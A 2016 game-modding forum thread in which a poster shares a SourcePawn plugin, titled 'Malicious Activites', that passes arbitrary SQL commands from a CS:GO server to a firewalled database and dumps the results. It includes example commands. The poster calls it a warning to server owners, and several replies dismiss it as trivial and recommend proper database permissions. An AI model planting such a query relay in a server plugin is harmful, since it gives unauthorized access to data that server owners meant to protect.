AlliedModders

AlliedModders (https://forums.alliedmods.net/index.php)
-   Snippets and Tutorials (https://forums.alliedmods.net/forumdisplay.php?f=112)
-   -   [SNIPPET] Malicious Activites (https://forums.alliedmods.net/showthread.php?t=288929)

OSWO 10-10-2016 17:30

[SNIPPET] Malicious Activites
 
You want your plugin to become Malicious? You want anyone to gain access over everything? SQL server firewall'ed? No Problem! Introducing all new!

So what this kinda shows is how a CS:GO server can be used as a VPN into a SQL server. Some SQL servers have a firewall to only allow inbound connections from a cs:go server, but this show you how to manipulate it.

So - at the end of the day - be very aware of who and what you give users to in your servers. There could theoretically a way to actually leave the confinement of the CS:GO server and access the whole VPS / Dedi entirely, but I haven't got up to that yet : ^)

Note: PrintToConsole has a limit on how much it can print, I could have it push to a stack and print a few at a time until it's all printed, but you can figure that one out : ^)

Some notable commands:

Code:

sm_test "example" "show tables;"
sm_test "example" "desc a_table_name;"
sm_test "example" "INSERT INTO exampe_example VALUES ('STEAM_1:1:1111', 100, 0.1, 'more text');"

PHP Code:

public Action command_test(int I_Clientint I_Args) {
    
char C_Server[64], C_Statement[512], C_Error[512];

    
GetCmdArg(1C_Serversizeof(C_Server));
    
GetCmdArg(2C_Statementsizeof(C_Statement));

    
Database New = SQL_Connect(C_ServertrueC_Errorsizeof(C_Error));

    if (New != 
INVALID_HANDLE) {
        
PrintToChat(I_Client"Connection To %s Successful"C_Server);

        
SQL_TQuery(New, sqlTestC_StatementGetClientUserId(I_Client), DBPrio_High);
        
PrintToChat(I_Client"Executing: %s"C_Statement);
    } else {
        
PrintToChat(I_Client"Error: %s"C_Error);
    }

    return 
Plugin_Handled;
}

public 
void sqlTest(Handle ownerHandle hndlchar[] errorint I_UserID) {
    
char C_buffer[512], C_String[512], C_FieldName[64];
    
int I_Client GetClientOfUserId(I_UserID);

    if (
IsClientInGame(I_Client)) {
        if (
hndl != INVALID_HANDLE) {
            
PrintToChat(I_Client"Executed");

            if (
SQL_GetRowCount(hndl) > 0) {
                
int I_Fields SQL_GetFieldCount(hndl);

                for (
int i 0I_Fieldsi++) {
                    
SQL_FieldNumToName(hndliC_FieldNamesizeof(C_FieldName));
                    
Format(C_buffersizeof(C_buffer), "%s%s: "C_bufferC_FieldName);
                }

                
PrintToConsole(I_ClientC_buffer);
                
Format(C_buffersizeof(C_buffer), "");

                while (
SQL_FetchRow(hndl)) {
                    for (
int i 0I_Fieldsi++) {
                        
SQL_FetchString(hndliC_Stringsizeof(C_String));
                        
Format(C_buffersizeof(C_buffer), "%s%s, "C_bufferC_String);
                    }

                    
PrintToConsole(I_ClientC_buffer);
                    
Format(C_buffersizeof(C_buffer), "");
                }
            }
        } else {
            
PrintToChat(I_Clienterror);
        }
    }


Example Taken From TangoTimer:

headline 10-10-2016 18:57

Re: [SNIPPET] Malicious Activites
 
aka How to print an entire database to console

What are you trying to say? That if you have access you can write a plugin to print contents of a database? lol I must be missing something

Neuro Toxin 10-10-2016 21:58

Re: [SNIPPET] Malicious Activites
 
Using a proper sql client is much better

OSWO 10-11-2016 04:51

Re: [SNIPPET] Malicious Activites
 
Quote:

Originally Posted by Neuro Toxin (Post 2461043)
Using a proper sql client is much better

Quote:

Originally Posted by OSWO (Post 2460993)
Many SQL servers have a firewall to only allow inbound connections from a cs:go server, but this show you how to manipulate it.

You are definitely lacking security if you allow people with SQL clients to freely connect to the SQL database. Looks like I'll have to to change the "Many" to "Some" cause it shows you clearly don't.

Firstly this isn't a plugin - it's to show Server Owners how allowing people access to the plugins directory but locking down the DB's is "safe" but in reality it's not. This is just a gateway for anyone to pass through any / all commands like a "SQL Client" but through the CS:GO. If you read the big portion of the text above the code you'd understand but seeing you look straight at the code and not read the information itself is your loss.

shavit 10-11-2016 09:56

Re: [SNIPPET] Malicious Activites
 
Quote:

Originally Posted by OSWO (Post 2461078)
You are definitely lacking security if you allow people with SQL clients to freely connect to the SQL database. Looks like I'll have to to change the "Many" to "Some" cause it shows you clearly don't.

http://stackoverflow.com/questions/1...sh-private-key

http://www.heidisql.com/

sneaK 10-11-2016 11:14

Re: [SNIPPET] Malicious Activites
 
Quote:

Originally Posted by OSWO (Post 2461078)
Firstly this isn't a plugin - it's to show Server Owners how allowing people access to the plugins directory but locking down the DB's is "safe" but in reality it's not.

If anyone has ever thought this was "safe" in the first place, they need to re-evaluate their own common sense and securities.

If you take a look over at the Lysis thread, there's some funny examples of database information being dumped, rcon passwords, etc.

Neuro Toxin 10-11-2016 18:46

Re: [SNIPPET] Malicious Activites
 
Quote:

Originally Posted by OSWO (Post 2461078)
You are definitely lacking security if you allow people with SQL clients to freely connect to the SQL database. Looks like I'll have to to change the "Many" to "Some" cause it shows you clearly don't.

I honestly dont understand a word your saying. It's all jibberish.

I figure u dont even know what injection is. I figure u make users with full permissions and dont understand permissions properly. A combination of both means I'll drop your entire schema.

I have an entire mysql cluster open to the public for my token and paintkit systems. I use permissions to control what these clients can do and have access to.

Moral is. Setup permissions and dont write injection vulnerable code.

Edit: If you can find my cluster and make a login, try do something naughty. The best u can do is leave me a message in a table row that will cost you .5AUD

I've had a few ppl do such for lols. They are now steam friends.

OSWO 10-11-2016 19:16

Re: [SNIPPET] Malicious Activites
 
Yawn.

Neuro Toxin 10-11-2016 19:23

Re: [SNIPPET] Malicious Activites
 
Fully. I'll just stfu :-)


All times are GMT -4. The time now is 18:52.

Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.